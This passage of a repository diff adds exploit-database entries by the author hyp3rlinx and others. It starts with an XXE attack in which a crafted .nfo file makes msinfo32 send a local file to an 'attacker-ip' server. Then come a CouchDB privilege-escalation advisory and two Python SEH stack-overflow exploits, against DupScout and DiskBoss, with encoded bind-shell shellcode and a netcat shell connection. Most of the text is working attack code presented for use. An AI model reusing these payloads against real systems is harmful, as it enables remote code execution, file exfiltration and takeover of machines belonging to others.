1) python -m SimpleHTTPServer 8080 (runs on attacker-ip / hosts payload.dtd)
|
||||
|
||||
|
||||
|
||||
2) "payload.dtd"
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-ip:8080?%file;'>">
|
||||
%all;
|
||||
|
||||
|
||||
|
||||
3) "FindMeThatBiatch.nfo" (corrupt .NFO file)
|
||||
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE HYP3RLINX [
|
||||
<!ENTITY % file SYSTEM "C:\Windows\msdfmap.ini">
|
||||
<!ENTITY % dtd SYSTEM "http://attacker-ip:8080/payload.dtd">
|
||||
%dtd;]>
|
||||
<pwn>&send;</pwn>
|
||||
|
||||
|
||||
|
||||
Double click to open FindMeThatBiatch.nfo, user gets error MSINFO32
|
||||
opens... attacker gets files.
|
||||
|
||||
OR open via Windows CL:
|
||||
c:\>msinfo32 \\REMOTE-SHARE\FindMeThatBiatch.nfo
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
======================================
|
||||
Vendor Notification: September 4, 2016
|
||||
Vendor Reply "not meet the bar for security servicing": September 7, 2016
|
||||
December 4, 2016 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
High
|
||||
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
hyp3rlinx
|
114
platforms/windows/local/40865.txt
Executable file
114
platforms/windows/local/40865.txt
Executable file
|
@ -0,0 +1,114 @@
|
|||
[+] Credits: John Page aka hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/APACHE-COUCHDB-LOCAL-PRIVILEGE-ESCALATION.txt
|
||||
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
==================
|
||||
couchdb.apache.org
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
==============
|
||||
CouchDB v2.0.0
|
||||
|
||||
Apache CouchDB is open source database software that focuses on ease of use
|
||||
and having an architecture. It has a document-oriented
|
||||
NoSQL database architecture and is implemented in the concurrency-oriented
|
||||
language Erlang; it uses JSON to store data, JavaScript
|
||||
as its query language using MapReduce, and HTTP for an API.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
Privilege Escalation (Insecure File Permissions)
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
CouchDB sets weak file permissions potentially allowing 'Standard' Windows
|
||||
users to elevate privileges. The "nssm.exe" (Apache CouchDB)
|
||||
executable can be replaced by a 'Standard' non administrator user, allowing
|
||||
them to add a backdoor Administrator account once the
|
||||
"Apache CouchDB" service is restarted or system rebooted.
|
||||
|
||||
As Apache CouchDB runs as LOCALSYSTEM, standard users can now execute
|
||||
arbitrary code with the privileges of the SYSTEM.
|
||||
|
||||
Issue is the 'C' flag (Change) for 'Authenticated Users' group.
|
||||
|
||||
|
||||
e.g.
|
||||
|
||||
c:\CouchDB>cacls * | findstr Users
|
||||
|
||||
BUILTIN\Users:(OI)(CI)(ID)R
|
||||
NT AUTHORITY\Authenticated Users:(ID)C
|
||||
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
|
||||
BUILTIN\Users:(OI)(CI)(ID)R
|
||||
NT AUTHORITY\Authenticated Users:(ID)C
|
||||
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
|
||||
BUILTIN\Users:(OI)(CI)(ID)R
|
||||
NT AUTHORITY\Authenticated Users:(ID)C
|
||||
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
|
||||
|
||||
|
||||
|
||||
c:\CouchDB>sc qc "Apache CouchDB"
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: Apache CouchDB
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 3 DEMAND_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\CouchDB\bin\nssm.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Apache CouchDB
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
Medium
|
||||
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
hyp3rlinx
|
78
platforms/windows/remote/40868.py
Executable file
78
platforms/windows/remote/40868.py
Executable file
|
@ -0,0 +1,78 @@
|
|||
#!/usr/bin/python
|
||||
#Open the DupScout client and click on Tools > click on Connect Network Drive > type the content of boom.txt in the "User Name" field. The payload is sent to the DupScout server (port 9126)
|
||||
#SEH based stack overflow in DupScout server
|
||||
#Tested in Windows 7 Professional
|
||||
#For educational proposes only
|
||||
|
||||
#msfvenom -a x86 --platform windows -p windows/shell/bind_tcp LPORT=4444 -e x86/alpha_mixed BufferRegister=EAX -f python
|
||||
buf = ""
|
||||
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
|
||||
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
|
||||
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
|
||||
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||
buf += "\x49\x6c\x49\x78\x6f\x72\x47\x70\x57\x70\x45\x50\x43"
|
||||
buf += "\x50\x4e\x69\x49\x75\x30\x31\x59\x50\x31\x74\x4e\x6b"
|
||||
buf += "\x30\x50\x34\x70\x4e\x6b\x53\x62\x66\x6c\x4c\x4b\x36"
|
||||
buf += "\x32\x45\x44\x4e\x6b\x52\x52\x44\x68\x34\x4f\x6d\x67"
|
||||
buf += "\x71\x5a\x51\x36\x76\x51\x49\x6f\x6c\x6c\x57\x4c\x70"
|
||||
buf += "\x61\x61\x6c\x53\x32\x34\x6c\x61\x30\x4b\x71\x38\x4f"
|
||||
buf += "\x44\x4d\x43\x31\x78\x47\x4b\x52\x4c\x32\x72\x72\x42"
|
||||
buf += "\x77\x4e\x6b\x36\x32\x44\x50\x6c\x4b\x72\x6a\x45\x6c"
|
||||
buf += "\x4e\x6b\x62\x6c\x32\x31\x51\x68\x4d\x33\x71\x58\x36"
|
||||
buf += "\x61\x78\x51\x72\x71\x4c\x4b\x30\x59\x65\x70\x66\x61"
|
||||
buf += "\x4a\x73\x6c\x4b\x73\x79\x72\x38\x7a\x43\x64\x7a\x43"
|
||||
buf += "\x79\x6c\x4b\x46\x54\x6c\x4b\x36\x61\x6a\x76\x75\x61"
|
||||
buf += "\x49\x6f\x4e\x4c\x5a\x61\x48\x4f\x34\x4d\x55\x51\x4b"
|
||||
buf += "\x77\x74\x78\x6b\x50\x74\x35\x6b\x46\x35\x53\x73\x4d"
|
||||
buf += "\x68\x78\x77\x4b\x43\x4d\x31\x34\x62\x55\x4b\x54\x33"
|
||||
buf += "\x68\x4e\x6b\x73\x68\x64\x64\x66\x61\x58\x53\x73\x56"
|
||||
buf += "\x6e\x6b\x74\x4c\x50\x4b\x6e\x6b\x73\x68\x75\x4c\x57"
|
||||
buf += "\x71\x38\x53\x4c\x4b\x44\x44\x6e\x6b\x77\x71\x4e\x30"
|
||||
buf += "\x6b\x39\x77\x34\x65\x74\x37\x54\x51\x4b\x53\x6b\x30"
|
||||
buf += "\x61\x46\x39\x43\x6a\x42\x71\x69\x6f\x79\x70\x53\x6f"
|
||||
buf += "\x53\x6f\x43\x6a\x6e\x6b\x66\x72\x7a\x4b\x4e\x6d\x71"
|
||||
buf += "\x4d\x71\x78\x74\x73\x70\x32\x65\x50\x75\x50\x75\x38"
|
||||
buf += "\x34\x37\x54\x33\x56\x52\x71\x4f\x56\x34\x63\x58\x30"
|
||||
buf += "\x4c\x74\x37\x46\x46\x56\x67\x49\x6f\x4b\x65\x58\x38"
|
||||
buf += "\x4c\x50\x35\x51\x73\x30\x65\x50\x55\x79\x4b\x74\x71"
|
||||
buf += "\x44\x30\x50\x71\x78\x51\x39\x4b\x30\x32\x4b\x55\x50"
|
||||
buf += "\x6b\x4f\x4b\x65\x62\x4a\x66\x6b\x51\x49\x56\x30\x69"
|
||||
buf += "\x72\x69\x6d\x51\x7a\x65\x51\x32\x4a\x37\x72\x73\x58"
|
||||
buf += "\x6b\x5a\x76\x6f\x4b\x6f\x4b\x50\x6b\x4f\x59\x45\x5a"
|
||||
buf += "\x37\x73\x58\x76\x62\x53\x30\x77\x61\x43\x6c\x6b\x39"
|
||||
buf += "\x48\x66\x43\x5a\x42\x30\x62\x76\x43\x67\x30\x68\x5a"
|
||||
buf += "\x62\x79\x4b\x54\x77\x53\x57\x6b\x4f\x79\x45\x4f\x75"
|
||||
buf += "\x6f\x30\x51\x65\x36\x38\x66\x37\x42\x48\x58\x37\x4d"
|
||||
buf += "\x39\x45\x68\x49\x6f\x49\x6f\x6b\x65\x32\x77\x70\x68"
|
||||
buf += "\x52\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x38\x55\x30"
|
||||
buf += "\x57\x6a\x37\x52\x48\x44\x35\x50\x6e\x70\x4d\x73\x51"
|
||||
buf += "\x49\x6f\x4e\x35\x62\x4a\x65\x50\x50\x6a\x54\x44\x30"
|
||||
buf += "\x56\x66\x37\x31\x78\x46\x62\x4a\x79\x78\x48\x71\x4f"
|
||||
buf += "\x69\x6f\x5a\x75\x4f\x73\x6b\x48\x35\x50\x53\x4e\x66"
|
||||
buf += "\x4d\x4e\x6b\x45\x66\x73\x5a\x37\x30\x52\x48\x35\x50"
|
||||
buf += "\x76\x70\x75\x50\x53\x30\x43\x66\x50\x6a\x43\x30\x30"
|
||||
buf += "\x68\x62\x78\x49\x34\x32\x73\x7a\x45\x4b\x4f\x68\x55"
|
||||
buf += "\x4d\x43\x56\x33\x70\x6a\x55\x50\x46\x36\x62\x73\x53"
|
||||
buf += "\x67\x32\x48\x35\x52\x6b\x69\x78\x48\x51\x4f\x79\x6f"
|
||||
buf += "\x79\x45\x6d\x53\x69\x68\x37\x70\x53\x4e\x67\x77\x46"
|
||||
buf += "\x61\x39\x53\x55\x79\x6b\x76\x34\x35\x7a\x49\x6f\x33"
|
||||
buf += "\x41\x41"
|
||||
|
||||
nseh = "\x54\x58\x41\x41"
|
||||
seh = "\x4f\x40\x12\x10"
|
||||
|
||||
align = "\x05\x34\x28\x25\x41" #add eax,0x41252843
|
||||
align += "\x2d\x7e\43\x25\x41" #sub eax,0x4125437e
|
||||
align += "\x50" #push eax
|
||||
align += "\xc3" #ret
|
||||
|
||||
offset = 1584
|
||||
|
||||
buffer = "\x41"*175 + buf
|
||||
buffer += "\x42"*(offset-175-len(buf))
|
||||
buffer += nseh + seh
|
||||
buffer += align + "\x44"*(1000-len(align))
|
||||
|
||||
file = open('boom.txt','w')
|
||||
file.write(buffer)
|
||||
file.close()
|
67
platforms/windows/remote/40869.py
Executable file
67
platforms/windows/remote/40869.py
Executable file
|
@ -0,0 +1,67 @@
|
|||
#!/usr/bin/python
|
||||
import socket,os,time
|
||||
|
||||
#SEH Stack Overflow in GET request
|
||||
#DiskBoss Enterprise 7.4.28
|
||||
#Tested on Windows XP SP3 & Windows 7 Professional
|
||||
#For educational proposes only
|
||||
|
||||
host = "192.168.1.20"
|
||||
port = 80
|
||||
|
||||
#badchars \x00\x09\x0a\x0d\x20
|
||||
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00\x09\x0a\x0d\x20" -f python
|
||||
buf = ""
|
||||
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
|
||||
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
|
||||
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
|
||||
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
|
||||
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
|
||||
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
|
||||
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
|
||||
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
|
||||
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
|
||||
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
|
||||
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
|
||||
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
|
||||
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
|
||||
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
|
||||
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
|
||||
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
|
||||
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
|
||||
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
|
||||
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
|
||||
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
|
||||
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
|
||||
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
|
||||
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
|
||||
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
|
||||
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
|
||||
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
|
||||
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
|
||||
buf += "\xc4\x25\x3d\xe9"
|
||||
|
||||
#Overwrite SEH handler
|
||||
stackpivot = "\x5c\x60\x04\x10" #ADD ESP,0x68 + RETN
|
||||
|
||||
buf_len = 5250
|
||||
|
||||
crash = "\x90"*20 + buf + "\x41"*(2491-20-len(buf)) + stackpivot + "\x44"*(buf_len-8-2487)
|
||||
|
||||
request = "GET /" + crash + "HTTP/1.1" + "\r\n"
|
||||
request += "Host: " + host + "\r\n"
|
||||
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
|
||||
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
|
||||
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
|
||||
request += "Accept-Encoding: gzip, deflate" + "\r\n"
|
||||
request += "Connection: keep-alive" + "\r\n\r\n"
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host,port))
|
||||
s.send(request)
|
||||
|
||||
s.close()
|
||||
|
||||
print "Waiting for shell..."
|
||||
time.sleep(5)
|
||||
os.system("nc " + host + " 4444")
|
Loading…
Add table
Reference in a new issue